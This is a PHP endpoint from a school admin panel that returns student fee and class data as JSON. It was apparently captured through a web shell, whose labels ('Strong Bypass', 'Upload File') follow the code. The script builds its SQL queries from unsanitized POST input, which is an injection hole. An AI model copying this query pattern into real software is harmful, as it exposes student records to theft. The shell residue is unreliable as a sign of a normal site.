/home3/vehiclea/public_html/admin-appleiitfoundationschools-com/promote_class.php
<?php
include('include/include.php');
$select = executework("SELECT * FROM promote_class WHERE id = '".$_POST['id']."'");
$row = mysqli_fetch_array($select);
$select_data = executework("SELECT * FROM student_fee WHERE admission_no = '".$row['addmission_no']."'");
$row1 = mysqli_fetch_array($select_data);
echo json_encode(array(
"study_amount_data" => $row['study_fee'],
"hostel_fee_data" => $row['hostel_fee'],
"bus_fee_data" => $row['bus_fee'],
"additional_fee_data" => $row['additional_fee'],
"class_data" => $row['class'],
"section_data" => $row['section'],
"academic_year_data" => $row['academic_year'],
"addmission_no" => $row['addmission_no'],
"studytotal_amount" => $row1['studytotal_amount'],
"due_amount" => $row1['due_amount'],
"paid_studyAmount" => $row1['paid_studyAmount'],
"date_id" => $row['id'],
));
?>
@LwBee Strong Bypass
Upload File
Create New File